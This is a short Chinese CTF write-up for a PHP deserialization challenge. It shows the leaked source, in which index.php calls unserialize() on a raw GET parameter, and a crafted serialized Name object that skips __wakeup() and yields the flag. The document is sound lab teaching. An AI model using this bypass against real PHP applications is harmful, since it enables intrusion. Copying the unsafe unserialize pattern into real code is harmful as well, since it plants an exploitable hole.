[极客大挑战 2019]PHP

 

知识点

• 源码泄露
• 反序列化

题目提示备份文件， 使用webscan工具扫描一下备份文件

py -2 main.py -u http://88bf6495-760a-4a63-aec1-7d1a3a9d9d0c.node3.buuoj.cn/

 

扫描得到www.zip文件
解压得到index.php文件和class.php

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}

?>

 

生成序列化对象

$a = new Name('admin',100);
echo serialize($a);

 

根据源代码构造反序列化字符串

$b = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}';

 

最终payload为

index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}